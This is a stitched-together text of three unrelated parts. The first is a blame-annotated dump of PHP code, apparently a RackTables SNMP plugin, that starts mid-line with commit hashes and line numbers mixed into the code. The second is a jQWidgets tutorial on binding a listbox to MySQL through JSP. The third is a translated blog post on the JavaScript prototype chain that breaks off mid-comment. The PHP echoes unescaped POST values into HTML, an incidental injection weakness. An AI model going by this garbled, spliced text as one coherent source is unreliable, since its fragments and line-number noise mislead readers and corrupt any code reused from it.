href=$ipaddrhref>$ipaddr/$maskbits</a></td></tr>"; 30bf198b 1872 } else { 9276dc97 1873 $ipaddrcell .= "<td>$ipaddr/$maskbits</td></tr>"; 30bf198b 1874 } 9276dc97 1875 30bf198b 1876 } // foreach 9276dc97 ME 1877 unset($ipaddr); 1878 unset($value); 30bf198b 1879 9276dc97 1880 $ipaddrcell .= '</table>'; 30bf198b 1881 1882 // if(!empty($ipaddresses)) 9276dc97 ME 1883 } else { 1884 $ipaddrcreatecheckbox = ''; 1885 $ipaddrcell = ''; 9276dc97 ME 1886 } 1887 9276dc97 1888 /* checkboxes for add port and add ip */ 30bf198b 1889 /* FireFox needs <b style=..>, IE and Opera work with <td style=..> */ 9276dc97 ME 1890 if(!$disableport) 1891 $portcreatecheckbox = '<b style="background-color:'.($disableport ? '#ff0000' : '#00ff00') 1892 .'"><input class="ports" style="background-color:'.($disableport ? '#ff0000' : '#00ff00') 1893 .'" type="checkbox" name="portcreate['.$if.']" value="'.$if.'"' 1894 .($disableport ? ' disabled="disbaled"' : '').($createport ? ' checked="checked"' : '').'></b>'; 1895 else 1896 $portcreatecheckbox = ''; 30bf198b 1897 9276dc97 ME 1898 /* port type id */ 1899 /* add port type to newporttypeoptions if missing */ 1900 if(strpos(serialize($newporttypeoptions),$porttypeid) === FALSE) { 1901 1902 $portids = explode('-',$porttypeid); 1903 $oif_name = $sg_portoifoptions[$portids[1]]; 1904 30bf198b 1905 $newporttypeoptions['auto'] = array($porttypeid => "*$oif_name"); 9276dc97 ME 1906 } 1907 1908 $selectoptions = array('name' => "porttypeid[$if]"); 1909 cb15032d 1910 if($disableport && !$updateporttype) 9276dc97 ME 1911 $selectoptions['disabled'] = "disabled"; 1912 cb15032d 1913 $updateporttypecheckbox = ""; 1914 cb15032d 1915 if($updateporttype) 1916 $updateporttypecheckbox = '<b style="background-color:#00ff00;">' 1917 .'<input class="porttype" style="background-color:#00ff00;" type="checkbox" name="updateporttype['.$if.']" value="' b9680799 1918 .$port_info['id'].'"></b>'; cb15032d 1919 9276dc97 ME 1920 $porttypeidselect = getNiftySelect($newporttypeoptions, $selectoptions, $porttypeid); 1921 c7fc6067 1922 $updatelabelcheckbox = ""; 1923 1924 if($updatelabel) 1925 $updatelabelcheckbox = '<b style="background-color:#00ff00;">' 1926 .'<input class="label" style="background-color:#00ff00;" type="checkbox" name="updatelabel['.$if.']" value="' 1927 .$port_info['id'].($updatelabel ? 
'" checked="checked"' : '' ).'></b>'; 1928 9276dc97 ME 1929 $comment = trim($comment,', '); 1930 c7fc6067 1931 $ifsnmp->printifInfoTableRow($if,"<td>$ipaddrcell</td><td>$portcreatecheckbox</td><td>$updatelabelcheckbox</td><td>$updatemaccheckbox</td><td>$updateporttypecheckbox</td><td>$porttypeidselect</td><td nowrap=\"nowrap\">$comment</td>", $hrefs); 9276dc97 ME 1932 1933 } 1934 unset($if); 1935 1936 /* preserve snmpconfig */ 1937 foreach($_POST as $key => $value) { 1938 echo '<input type=hidden name='.$key.' value='.$value.' />'; 1939 } 1940 unset($key); 1941 unset($value); 1942 1943 echo '<tr><td colspan=15 align="right"><p><input id="createbutton" type=submit value="Create Ports and IPs" onclick="return confirm(\'Create selected items?\')"></p></td></tr></tbody></table></form>'; 1944 ccf830c6 1945} // END function snmpgeneric_list 9276dc97 ME 1946 1947/* -------------------------------------------------- */ 1948function snmpgeneric_opcreate() { 1949 1950 $object_id = $_REQUEST['object_id']; 1951 $attr = getAttrValues($object_id); 1952 1953// sg_var_dump_html($_REQUEST); 1954// sg_var_dump_html($attr); 1955 1956 /* commitUpdateAttrValue ($object_id, $attr_id, $new_value); */ 1957 if(isset($_POST['updateattr'])) { 1958 foreach($_POST['updateattr'] as $attr_id => $value) { 1959 // if(empty($attr[$attr_id]['value'])) 1960 if(!empty($value)) { 1961 commitUpdateAttrValue ($object_id, $attr_id, $value); 1962 showSuccess("Attribute ".$attr[$attr_id]['name']." set to $value"); 1963 } 1964 } 1965 unset($attr_id); 1966 unset($value); 1967 } 1968 /* updateattr */ 1969 1970 /* create ports */ 1971 if(isset($_POST['portcreate'])) { 1972 foreach($_POST['portcreate'] as $if => $value) { 1973 1974 $ifName = (isset($_POST['ifName'][$if]) ? trim($_POST['ifName'][$if]) : '' ); 1975 $ifPhysAddress = (isset($_POST['ifPhysAddress'][$if]) ? trim($_POST['ifPhysAddress'][$if]) : '' ); 1976 $ifAlias = (isset($_POST['ifAlias'][$if]) ? trim($_POST['ifAlias'][$if]) : '' ); 1977 $ifDescr = (isset($_POST['ifDescr'][$if]) ? trim($_POST['ifDescr'][$if]) : '' ); 1978 649076d7 1979 //$visible_label = (empty($ifAlias) ? 
/* -------------------------------------------------- */
function snmpgeneric_opcreate() {

	$object_id = $_REQUEST['object_id'];
	$attr = getAttrValues($object_id);

//	sg_var_dump_html($_REQUEST);
//	sg_var_dump_html($attr);

	/* commitUpdateAttrValue ($object_id, $attr_id, $new_value); */
	if(isset($_POST['updateattr'])) {
		foreach($_POST['updateattr'] as $attr_id => $value) {
		//	if(empty($attr[$attr_id]['value']))
			if(!empty($value)) {
				commitUpdateAttrValue ($object_id, $attr_id, $value);
				showSuccess("Attribute ".$attr[$attr_id]['name']." set to $value");
			}
		}
		unset($attr_id);
		unset($value);
	}
	/* updateattr */

	/* create ports */
	if(isset($_POST['portcreate'])) {
		foreach($_POST['portcreate'] as $if => $value) {

			$ifName = (isset($_POST['ifName'][$if]) ? trim($_POST['ifName'][$if]) : '' );
			$ifPhysAddress = (isset($_POST['ifPhysAddress'][$if]) ? trim($_POST['ifPhysAddress'][$if]) : '' );
			$ifAlias = (isset($_POST['ifAlias'][$if]) ? trim($_POST['ifAlias'][$if]) : '' );
			$ifDescr = (isset($_POST['ifDescr'][$if]) ? trim($_POST['ifDescr'][$if]) : '' );

			//$visible_label = (empty($ifAlias) ? '' : $ifAlias.'; ').$ifDescr;
			$visible_label = $ifAlias;

			if(empty($ifName)) {
				showError('Port without ifName '.$_POST['porttypeid'][$if].', '.$visible_label.', '.$ifPhysAddress);
			} else {
				commitAddPort ($object_id, $ifName, $_POST['porttypeid'][$if], $visible_label, $ifPhysAddress);
				showSuccess('Port created '.$ifName.', '.$_POST['porttypeid'][$if].', '.$visible_label.', '.$ifPhysAddress);
			}
		}
		unset($if);
		unset($value);
	}
	/* portcreate */

	/* net create */
	if(isset($_POST['netcreate'])) {
		foreach($_POST['netcreate'] as $id => $addrtype) {
			$range = $_POST['netprefix'][$id];
			$name = $_POST['netname'][$id];
			$is_reserved = isset($_POST['netreserve'][$id]);

			if($addrtype == 'ipv4' || $addrtype == 'ipv4z')
				createIPv4Prefix($range, $name, $is_reserved);
			else
				createIPv6Prefix($range, $name, $is_reserved);

			showSuccess("$range $name created");

		}
		unset($id);
		unset($addrtype);
	}
	/* netcreate */

	/* allocate ipv6 addresses */
	if(isset($_POST['ipv6addrcreate'])) {
		foreach($_POST['ipv6addrcreate'] as $ipaddr => $if) {

			bindIPv6ToObject(ip6_parse($ipaddr), $object_id,$_POST['ifName'][$if], 1); /* connected */
			showSuccess("$ipaddr allocated");
		}
		unset($ipaddr);
		unset($if);
	}
	/* allocate ip addresses */
	if(isset($_POST['ipaddrcreate'])) {
		foreach($_POST['ipaddrcreate'] as $ipaddr => $if) {

			bindIPToObject(ip_parse($ipaddr), $object_id,$_POST['ifName'][$if], 1); /* connected */
			showSuccess("$ipaddr allocated");
		}
		unset($ipaddr);
		unset($if);
	}
	/* ipaddrcreate */

	/* update label */
	if(isset($_POST['updatelabel'])) {
		foreach($_POST['updatelabel'] as $if => $port_id) {

			$ifAlias = (isset($_POST['ifAlias'][$if]) ? trim($_POST['ifAlias'][$if]) : '' );

			sg_commitUpdatePortLabel($object_id, $port_id, $ifAlias);

			$ifName = (isset($_POST['ifName'][$if]) ? trim($_POST['ifName'][$if]) : '' );
			showSuccess("label updated on $ifName to $ifAlias");
		}
		unset($if);
		unset($port_id);
	}
	/* updatelabel */

	/* update mac addresses only */
	if(isset($_POST['updatemac'])) {
		foreach($_POST['updatemac'] as $if => $port_id) {

			$ifPhysAddress = (isset($_POST['ifPhysAddress'][$if]) ? trim($_POST['ifPhysAddress'][$if]) : '' );

			sg_commitUpdatePortl2address($object_id, $port_id, $ifPhysAddress);

			$ifName = (isset($_POST['ifName'][$if]) ? trim($_POST['ifName'][$if]) : '' );
			showSuccess("l2address updated on $ifName to $ifPhysAddress");
		}
		unset($if);
		unset($port_id);
	}
	/* updatemac */

	/* update port type */
	if(isset($_POST['updateporttype'])) {
		foreach($_POST['updateporttype'] as $if => $port_id) {

			$porttypeid = (isset($_POST['porttypeid'][$if]) ? trim($_POST['porttypeid'][$if]) : '' );

			sg_commitUpdatePortType($object_id, $port_id, $porttypeid);

			$ifName = (isset($_POST['ifName'][$if]) ? trim($_POST['ifName'][$if]) : '' );
			showSuccess("port type updated on $ifName");
		}
		unset($if);
		unset($port_id);
	}
	/* updateporttype */
} /* snmpgeneric_opcreate */

/* -------------------------------------------------- */

/* returns RT interface type depending on ifType, ifDescr, .. */
function guessRToif_id($ifType,$ifDescr = NULL) {
	global $sg_ifType2oif_id;
	global $sg_portiifoptions;
	global $sg_portoifoptions;

	/* default value */
	$retval = '24'; /* 1000BASE-T */

	if(isset($sg_ifType2oif_id[$ifType])) {
		$retval = $sg_ifType2oif_id[$ifType];
	}

	if(strpos($retval,'-') === FALSE)
		$retval = "1-$retval";

	/* no ethernetCsmacd */
	if($ifType != 6)
		return $retval;

	/* try to identify outer and inner interface type from ifDescr */

	switch(true)
	{
		case preg_match('/fast.?ethernet/i',$ifDescr,$matches):
			// Fast Ethernet
			$retval = 19;
			break;
		case preg_match('/10.?gigabit.?ethernet/i',$ifDescr,$matches):
			// 10-Gigabit Ethernet
			$retval = 1642;
			break;
		case preg_match('/gigabit.?ethernet/i',$ifDescr,$matches):
			// Gigabit Ethernet
			$retval = 24;
			break;
	}

	/**********************
	 * ifDescr samples
	 *
	 * Enterasys C3
	 *
	 * Unit: 1 1000BASE-T RJ45 Gigabit Ethernet Frontpanel Port 45 - no sfp inserted
	 * Unit: 1 1000BASE-T RJ45 Gigabit Ethernet Frontpanel Port 47 - sfp 1000BASE-SX inserted
	 *
	 *
	 * Enterasys S4
	 *
	 * Enterasys Networks, Inc. 1000BASE Gigabit Ethernet Port; No GBIC/MGBIC Inserted
	 * Enterasys Networks, Inc. 1000BASE-SX Mini GBIC w/LC connector
	 * Enterasys Networks, Inc. 10GBASE SFP+ 10-Gigabit Ethernet Port; No SFP+ Inserted
	 * Enterasys Networks, Inc. 10GBASE-SR SFP+ 10-Gigabit Ethernet Port (850nm Short Wavelength, 33/82m MMF, LC)
	 * Enterasys Networks, Inc. 1000BASE Gigabit Ethernet Port; Unknown GBIC/MGBIC Inserted
	 *
	 */

	foreach($sg_portiifoptions as $iif_id => $iif_type) {

		/* TODO better matching */

		/* find iif_type */
		if(preg_match('/(.*?)('.preg_quote($iif_type).')(.*)/i',$ifDescr,$matches)) {

			$oif_type = "empty ".$iif_type;

			$no = preg_match('/ no $/i', $matches[1]);

			if(preg_match('/(\d+[G]?)BASE[^ ]+/i', $matches[1], $basematch)) {
				$oif_type=$basematch[0];
			} else {
				if(preg_match('/(\d+[G]?)BASE[^ ]+/i', $matches[3], $basematch)) {
					$oif_type=$basematch[0];
				}
			}

			if($iif_id == -1) {
				/* 2 => SFP-100 or 4 => SFP-1000 */

				if(isset($basematch[1])) {
					switch($basematch[1]) {
						case '100' :
							$iif_id = 2;
							$iif_type = "SFP-100";
							break;
						default:
						case '1000' :
							$iif_id = 4;
							$iif_type = "SFP-1000";
							break;
					}
				}

				if(preg_match('/sfp 1000-sx/i',$ifDescr))
					$oif_type = '1000BASE-SX';

				if(preg_match('/sfp 1000-lx/i',$ifDescr))
					$oif_type = '1000BASE-LX';

			}

			if($no) {
				$oif_type = "empty ".$iif_type;
			}

			$oif_type = preg_replace('/BASE/',"Base",$oif_type);

			$oif_id = array_search($oif_type,$sg_portoifoptions);

			if($oif_id != '') {
				$retval = "$iif_id-$oif_id";
			}

			/* TODO check port compat */

			/* stop foreach */
			break;
		}
	}
	unset($iif_id);
	unset($iif_type);

	if(strpos($retval,'-') === FALSE)
		$retval = "1-$retval";

	return $retval;

}
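/*
 * Worked examples for guessRToif_id() (illustrative; the exact results depend
 * on the stock RackTables port-type dictionary and the $sg_ifType2oif_id map):
 *
 *   guessRToif_id(6, 'FastEthernet0/1')        => '1-19'   (ifDescr match, Fast Ethernet)
 *   guessRToif_id(6, 'GigabitEthernet1/0/25')  => '1-24'   (Gigabit Ethernet)
 *   guessRToif_id(6, '10GigabitEthernet1/49')  => '1-1642' (10-Gigabit Ethernet)
 *
 * When an inner interface name such as "SFP+" or "GBIC" appears in ifDescr,
 * the loop above overrides the result with a matching iif_id-oif_id pair.
 */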
/* --------------------------------------------------- */

function sg_commitUpdatePortl2address($object_id, $port_id, $port_l2address)
{
	$db_l2address = l2addressForDatabase ($port_l2address);

	global $dbxlink;
	$dbxlink->exec ('LOCK TABLES Port WRITE');
	if (alreadyUsedL2Address ($db_l2address, $object_id))
	{
		$dbxlink->exec ('UNLOCK TABLES');
		// FIXME: it is more correct to throw InvalidArgException here
		// and convert it to InvalidRequestArgException at upper level,
		// when there is a mean to do that.
		throw new InvalidRequestArgException ('port_l2address', $db_l2address, 'address belongs to another object');
	}
	usePreparedUpdateBlade
	(
		'Port',
		array
		(
			'l2address' => ($db_l2address === '') ? NULL : $db_l2address,
		),
		array
		(
			'id' => $port_id,
			'object_id' => $object_id
		)
	);
	$dbxlink->exec ('UNLOCK TABLES');
} /* sg_commitUpdatePortl2address */

/* --------------------------------------------------- */

function sg_commitUpdatePortType($object_id, $port_id, $porttypeid)
{
	global $dbxlink;

	list($iif_id, $type) = explode("-",$porttypeid);

	$dbxlink->exec ('LOCK TABLES Port WRITE');
	usePreparedUpdateBlade
	(
		'Port',
		array
		(
			'iif_id' => ($iif_id === '') ? NULL : $iif_id,
			'type' => ($type === '') ? NULL : $type
		),
		array
		(
			'id' => $port_id,
			'object_id' => $object_id
		)
	);
	$dbxlink->exec ('UNLOCK TABLES');
} /* sg_commitUpdatePortType */

function sg_commitUpdatePortLabel($object_id, $port_id, $label)
{
	global $dbxlink;

	$dbxlink->exec ('LOCK TABLES Port WRITE');
	usePreparedUpdateBlade
	(
		'Port',
		array
		(
			'label' => ($label === '') ? NULL : $label
		),
		array
		(
			'id' => $port_id,
			'object_id' => $object_id
		)
	);
	$dbxlink->exec ('UNLOCK TABLES');
} /* sg_commitUpdatePortLabel */
/* ----------------------------------------------------- */

/* returns object_id and port_id to a given l2address */
function sg_checkL2Address ($address)
{
	$result = usePreparedSelectBlade
	(
		'SELECT object_id,id FROM Port WHERE BINARY l2address = ?',
		array ($address)
	);
	$row = $result->fetchAll(PDO::FETCH_GROUP|PDO::FETCH_UNIQUE|PDO::FETCH_COLUMN);
	return $row;
}

function sg_checkObjectNameUniqueness ($name, $type_id, $object_id = 0)
{
	// Some object types do not need unique names
	// 1560 - Rack
	// 1561 - Row
	$dupes_allowed = array (1560, 1561);
	if (in_array ($type_id, $dupes_allowed))
		return true;

	$result = usePreparedSelectBlade
	(
		'SELECT COUNT(*) FROM Object WHERE name = ? AND id != ?',
		array ($name, $object_id)
	);
	$row = $result->fetch (PDO::FETCH_NUM);
	if ($row[0] != 0)
		return false;
	else
		return true;
}

function sg_detectDeviceBreedByObject($object)
{
	global $breed_by_swcode, $breed_by_hwcode, $breed_by_mgmtcode;

	foreach ($object['attr'] as $record)
	{
		if ($record['id'] == 4 and array_key_exists ($record['key'], $breed_by_swcode))
			return $breed_by_swcode[$record['key']];
		elseif ($record['id'] == 2 and array_key_exists ($record['key'], $breed_by_hwcode))
			return $breed_by_hwcode[$record['key']];
		elseif ($record['id'] == 30 and array_key_exists ($record['key'], $breed_by_mgmtcode))
			return $breed_by_mgmtcode[$record['key']];
	}
	return '';
}

/* ------------------------------------------------------- */
2bfc8235 2388 2389 return true; 2390 } 2391 2392 function __set($name, $value) 2393 { 2394 switch($name) 2395 { 2396 case 'quick_print': 2397 snmp_set_quick_print($value); 2398 break; 2399 case 'oid_output_format': 2141ed46 2400 /* needs php >= 5.2.0 */ 2bfc8235 2401 snmp_set_oid_output_format($value); 2402 break; 2403 case 'enum_print': 2404 snmp_set_enum_print($value); 2405 break; 2406 case 'valueretrieval': 2407 snmp_set_valueretrieval($value); 2408 break; 2409 default: 2410 $trace = debug_backtrace(); 2411 trigger_error( 2412 'Undefined property via __set(): ' . $name . 2413 ' in ' . $trace[0]['file'] . 2414 ' on line ' . $trace[0]['line'], 2415 E_USER_NOTICE); 2416 return null; 2417 } 9276dc97 ME 2418 } 2419 2420 function walk( $oid, $suffix_as_key = FALSE) { 2421 2422 switch($this->version) { 2423 case self::VERSION_1: 2424 if($suffix_as_key){ 2425 $this->result = snmpwalk($this->host,$this->community,$oid); 2426 } else { 2427 $this->result = snmprealwalk($this->host,$this->community,$oid); 2428 } 2429 break; 2430 2431 case self::VERSION_2C: 2bfc8235 2432 case self::VERSION_2c: 9276dc97 ME 2433 if($suffix_as_key){ 2434 $this->result = snmp2_walk($this->host,$this->community,$oid); 2435 } else { 2436 $this->result = snmp2_real_walk($this->host,$this->community,$oid); 2437 } 2438 break; 2439 2440 case self::VERSION_3: 2441 if($suffix_as_key){ 2442 $this->result = snmp3_walk($this->host,$this->community, $this->sec_level, $this->auth_protocol, $this->auth_passphrase, $this->priv_protocol, $this->priv_passphrase,$oid); 2443 } else { 2444 $this->result = snmp3_real_walk($this->host,$this->community, $this->sec_level, $this->auth_protocol, $this->auth_passphrase, $this->priv_protocol, $this->priv_passphrase,$oid); 2445 } 2446 break; 2447 } 2448 2449 return $this->result; 2450 2451 } 2452 2453 private function __snmpget($object_id) { 2454 2455 $retval = FALSE; 30bf198b 2456 9276dc97 ME 2457 switch($this->version) { 2458 case self::VERSION_1: 2459 $retval = snmpget($this->host,$this->community,$object_id); 2460 break; 2461 2462 case self::VERSION_2C: 2bfc8235 2463 case self::VERSION_2c: 9276dc97 ME 2464 $retval = snmp2_get($this->host,$this->community,$object_id); 2465 break; 2466 2467 case self::VERSION_3: 2468 $retval = snmp3_get($this->host,$this->community, $this->sec_level, $this->auth_protocol, $this->auth_passphrase, $this->priv_protocol, $this->priv_passphrase,$object_id); 2469 break; 2470 } 2471 2472 return $retval; 2473 } 2474 2475 function get($object_id, $preserve_keys = false) { 2476 2477 if(is_array($object_id)) { 2478 2479 if( $preserve_keys ) { 2480 foreach($object_id as $oid) { 2481 $this->result[$oid] = $this->__snmpget($oid); 2482 } 2483 unset($oid); 2484 } else { 2485 foreach($object_id as $oid) { 2486 $result_oid = preg_replace('/.\d$/','',$oid); 2487 $this->result[$result_oid] = $this->__snmpget($oid); 2488 } 2489 unset($oid); 2490 } 2491 } else { 2492 $this->result = $this->__snmpget($object_id); 2493 } 2494 2495 return $this->result; 30bf198b 2496 9276dc97 ME 2497 } 2498 2499 function close() { 2500 } 2501 2502 function getErrno() { 2503 return ($this->result === FALSE); 2504 } 2505 2506 function getError() { 2507 $var = error_get_last(); 2508 return $var['message']; 2509 } 30bf198b 2510 2511 function Errorhandler($errno, $errstr, $errfile, $errline) { 2512 switch(TRUE) { 2513 case (False !== strpos($errstr,'No Such Object available on this agent at this OID')): 2514 /* no further error processing */ 2515 return true; 2516 break; 2517 } 2518 2519 /* proceed with 
default error handling */ 2520 return false; 2521 } 9276dc97 ME 2522} /* SNMPgeneric */ 2523 2524/* ------------------------------------------------------- */ 2525/* 30bf198b 2526 * SNMP with system OIDs 9276dc97 ME 2527 */ 2528class mySNMP extends SNMPgeneric implements Iterator { 2529 2bfc8235 2530 const SNMP_VERSION = parent::VERSION_2C; 9276dc97 ME 2531 const SNMP_COMMUNITY = 'public'; 2532 2533 public $lastgetoid; 2534 2535 //private $sysInfo; 2536 private $system; 2537 2538 /* is system table available ? */ 2539 private $systemerror = TRUE; 2540 2541 function __construct($version, $host, $community) { 2bfc8235 2542 2543 switch($version) 2544 { 2545 case '1': 2546 case 'v1': 2547 $version = parent::VERSION_1; 2548 break; 2549 case '2': 2550 case 'v2C': 2551 case 'v2c': 2552 $version = parent::VERSION_2c; 2553 break; 2554 case '3': 2555 case 'v3': 2556 $version = parent::VERSION_3; 2557 break; 2558 }; 2559 9276dc97 ME 2560 parent::__construct($version, $host, $community); 2561 9276dc97 2562 /* Return values without SNMP type hint */ 2bfc8235 2563 $this->valueretrieval = SNMP_VALUE_PLAIN; 9276dc97 2564 9276dc97 ME 2565 } /* __construct */ 2566 2567 function init() { 2141ed46 2568 2569 $this->oid_output_format = SNMP_OID_OUTPUT_FULL; 9276dc97 ME 2570 /* .iso.org.dod.internet.mgmt.mib-2.system */ 2571 $this->system = $this->walk(".1.3.6.1.2.1.1"); 2572 2573 $this->systemerror = $this->getErrno() || empty($this->system); 2574 } /* init() */ 2575 2576 /* get value from system cache */ 2577 private function _getvalue($object_id) { 2578 2579 /* TODO better matching */ 2580 2581 if( isset($this->system["SNMPv2-MIB::$object_id"])) { 2582 $this->lastgetoid = "SNMPv2-MIB::$object_id"; 2583 return $this->system["SNMPv2-MIB::$object_id"]; 2584 } else { 2585 if( isset($this->system[".iso.org.dod.internet.mgmt.mib-2.system.$object_id"])) { 2586 $this->lastgetoid = ".iso.org.dod.internet.mgmt.mib-2.system.$object_id"; 2587 return $this->system[".iso.org.dod.internet.mgmt.mib-2.system.$object_id"]; 2588 } else { 2589 if( isset($this->system[$object_id])) { 2590 $this->lastgetoid = $object_id; 2591 return $this->system[$object_id]; 2592 } else { 2593 foreach($this->system as $key => $value) { 2594 if(strpos($key, $object_id)) { 2595 $this->lastgetoid = $key; 2596 return $value; 2597 } 2598 } 2599 unset($key); 2600 unset($value); 2601 } 2602 } 2603 } 2604 2605 return NULL; 2606 } 2607 2608 function get($object_id, $preserve_keys = false) { 2609 2610 if(!$this->systemerror) 2611 $retval = $this->_getvalue($object_id); 2612 else 2613 $retval = NULL; 2614 2615 if($retval === NULL) { 2616 $this->lastgetoid = $object_id; 2617 $retval = parent::get($object_id,$preserve_keys); 2618 } 2619 2620 return $retval; 2621 2622 } /* get */ 2623 2624 function translatetonumeric($oid) { 2625 global $sg_cmd_snmptranslate; 2626 2627 $val = exec(escapeshellcmd($sg_cmd_snmptranslate).' 
-On '.escapeshellarg($oid), $output, $retval); 2628 2629 if($retval == 0) 2630 return $val; 2631 2632 return FALSE; 2633 2634 } /* translatetonumeric */ 2635/* 2636 function get_new($object_id, $preserve_keys = false) { 2637 $result = parent::get($object_id,$preserve_keys); 2638 return $this->removeDatatype($result); 2639 } 2640 2641 function walk_new($object_id) { 2642 $result = parent::walk($object_id); 2643 return $this->removeDatatype($result); 2644 } 2645 2646*/ 2647 /* use snmp_set_valueretrieval(SNMP_VALUE_PLAIN) instead */ 2648/* function removeDatatype($val) { 2649 return preg_replace('/^\w+: /','',$val); 2650 } 2651*/ 2652 /* make something like $class->sysDescr work */ 2653 function __get($name) { 2654 if($this->systemerror) { 2655 return; 2656 } 30bf198b 2657 9276dc97 ME 2658 $retval = $this->_getvalue($name); 2659 2660 if($retval === NULL) { 2661 2662 $trace = debug_backtrace(); 30bf198b 2663 trigger_error( 2664
Bind jqxListBox to MySQL Database using JSP

In this help topic you will learn how to bind a jqxListBox to a MySQL database using JSP (JavaServer Pages). Important: before proceeding, please make sure you have followed the instructions of the tutorial Configure MySQL, Eclipse and Tomcat for Use with jQWidgets.

1. Connect to the Database and Retrieve the ListBox Data

To populate the listbox, we need a JSP file that connects to the Northwind database and retrieves data from it. Create a new JSP by right-clicking the project's WebContent folder, then choosing New → JSP File. Name the file select-data-simple.jsp.

Import the necessary classes in the beginning of the JSP. Then add a scriptlet to the JSP that does the following:

1. Makes a database connection.
2. Selects the necessary data from the database in a ResultSet.
3. Converts the ResultSet to a JSON array.
4. Prints (returns) the JSON array.

2. Create a Page with a jqxListBox

Create a new HTML page by right-clicking the project's WebContent folder, then choosing New → HTML File. The code of both files in our example is shown in the sketches at the end of this topic. Through jqxDataAdapter, the listbox is populated by the data retrieved from the database by select-data-simple.jsp.

To run the page, right-click it and select Run As → Run on Server. In the window that appears, select Tomcat v8.0 Server at localhost and click Finish.
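The original code listings of this topic did not survive extraction, so the two sketches below reconstruct them under stated assumptions: the JDBC URL, the credentials, the customers table with its CompanyName column, and the jQWidgets/jQuery script paths are illustrative guesses, not the vendor's original code.

A sketch of select-data-simple.jsp:

    <%@ page import="java.sql.Connection" %>
    <%@ page import="java.sql.DriverManager" %>
    <%@ page import="java.sql.ResultSet" %>
    <%@ page import="java.sql.Statement" %>
    <%
        // Load the MySQL JDBC driver and connect (URL and credentials are placeholders).
        Class.forName("com.mysql.jdbc.Driver");
        Connection connection = DriverManager.getConnection(
            "jdbc:mysql://localhost:3306/northwind", "root", "yourpassword");

        // 1-2. Make a database connection and select the data into a ResultSet.
        Statement statement = connection.createStatement();
        ResultSet resultSet = statement.executeQuery(
            "SELECT CompanyName FROM customers");

        // 3. Convert the ResultSet to a JSON array by hand.
        StringBuilder json = new StringBuilder("[");
        boolean first = true;
        while (resultSet.next()) {
            if (!first) {
                json.append(",");
            }
            json.append("{\"CompanyName\":\"")
                .append(resultSet.getString("CompanyName").replace("\"", "\\\""))
                .append("\"}");
            first = false;
        }
        json.append("]");

        resultSet.close();
        statement.close();
        connection.close();

        // 4. Print (return) the JSON array.
        out.print(json.toString());
    %>

A sketch of the HTML page; the jqxDataAdapter source points its url at the JSP above, and the listbox displays the CompanyName field:

    <!DOCTYPE html>
    <html>
    <head>
        <link rel="stylesheet" href="jqwidgets/styles/jqx.base.css" type="text/css" />
        <script type="text/javascript" src="scripts/jquery-1.11.1.min.js"></script>
        <script type="text/javascript" src="jqwidgets/jqxcore.js"></script>
        <script type="text/javascript" src="jqwidgets/jqxbuttons.js"></script>
        <script type="text/javascript" src="jqwidgets/jqxscrollbar.js"></script>
        <script type="text/javascript" src="jqwidgets/jqxlistbox.js"></script>
        <script type="text/javascript" src="jqwidgets/jqxdata.js"></script>
        <script type="text/javascript">
            $(document).ready(function () {
                // The data adapter calls the JSP and feeds its JSON to the listbox.
                var source = {
                    datatype: "json",
                    datafields: [{ name: "CompanyName" }],
                    url: "select-data-simple.jsp"
                };
                var dataAdapter = new $.jqx.dataAdapter(source);
                $("#jqxListBox").jqxListBox({
                    source: dataAdapter,
                    displayMember: "CompanyName",
                    width: 200,
                    height: 250
                });
            });
        </script>
    </head>
    <body>
        <div id="jqxListBox"></div>
    </body>
    </html>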
Understanding the JS Prototype Chain, Plainly and Brutally

2016/05/07 · JavaScript · 1 comment · prototype chain

Original source: 茄果

The prototype chain is a bit of a maze to understand, and the web is full of material on it. Whenever I can't sleep at night I like to dig up articles on prototype chains and closures; works wonders.

Stop agonizing over that pile of jargon. Beyond twisting your brain into a pretzel, it really won't help you. Let's look at the prototype chain plainly and brutally, thinking about something unrelated to code, say, humans and demons.

1) Humans are born of human mothers, demons of demon mothers. Humans and demons are object instances, and the mothers are prototypes. A prototype is also an object, called the prototype object.

2) A human mom and dad produce a pile of human babies; a demon mom and dad produce a pile of demon babies. The mating is the constructor function: baby-making, colloquially.

3) The mom keeps a record of the mating, so through her you can find that information. That is, through the prototype object you can find the constructor.

4) A mom can bear many babies, but each baby has exactly one mom. That is the uniqueness of the prototype.

5) Your mom was also born of her mom. Through your mom you can find your grandma, through grandma her mom, and so on. This chain of relationships is the prototype chain.

6) The prototype chain is not endless: keep tracing upward through the moms and you will eventually find that the mom of the mom of the mom... is not a person at all. The prototype chain ends at null.

7) Babies born of a human mom look human; babies born of a demon mom look demonic. That is inheritance.

8) You inherited your mom's skin color, she inherited hers from her mom, and so on. That is inheritance along the prototype chain.

9) You start dating, and her mom tells you to show up with a property deed. If you don't have one, she asks whether your mom has one; if your mom doesn't, whether your grandma has one... That is the upward search along the prototype chain.

10) You inherit your mom's looks, but you can still dye and restyle your hair. That is, an object can define its own properties, which override the inherited ones.

11) Even with your hair bleached blond, you cannot change how your mom looks, and your siblings' looks have nothing to do with your new hairdo. An object instance cannot change the prototype's own properties.

12) But if you burn down the family home, then your home, your mom's home, and your brothers' homes have all burned with it. Prototype properties are shared.

13) Your mom's nickname is A-Zhen, and the neighbors call you "A-Zhen's kid". But once your mom perms her hair into a Golden-Haired Lion King mane, the neighbors all switch to calling you "the Lion King's kid". That is the dynamic nature of the prototype.

14) Your mom loves beauty and flies to Korea for cosmetic surgery so thorough that even her own mother cannot recognize her. Even if she changes her hair back afterwards, the neighbors still call you the Lion King's kid: nobody recognizes her anymore, and the post-surgery mom is effectively a brand-new person. That is a complete rewrite of the prototype.

Enough already! Don't BB! Show me the code!

    function Person (name) {
        this.name = name;
    }
    function Mother () {
    }
    Mother.prototype = {    // Mother's prototype
        age: 18,
        home: ['Beijing', 'Shanghai']
    };
    Person.prototype = new Mother();    // Person's prototype is a Mother instance

    // Inspect this in Chrome devtools, which exposes prototypes through __proto__;
    // there are two prototype levels here, so watching it live beats reading about it.
    var p1 = new Person('Jack'); // p1:'Jack'; __proto__:{__proto__:18,['Beijing','Shanghai']}
    var p2 = new Person('Mark'); // p2:'Mark'; __proto__:{__proto__:18,['Beijing','Shanghai']}

    p1.age = 20;
    /* An instance cannot change a primitive-valued prototype property, just as your dye job
     * has nothing to do with your mom.
     * This is the ordinary act of adding an age property to p1, unrelated to the prototype;
     * same as var o = {}; o.age = 20.
     * p1: gains an own property age, while __proto__ still matches Mother.prototype, age = 18.
     * p2: only has name; __proto__ matches Mother.prototype.
     */

    p1.home[0] = 'Shenzhen';
    /* Reference-typed prototype properties are shared: burn down your home and you have
     * burned down the whole family's. (More on this one below.)
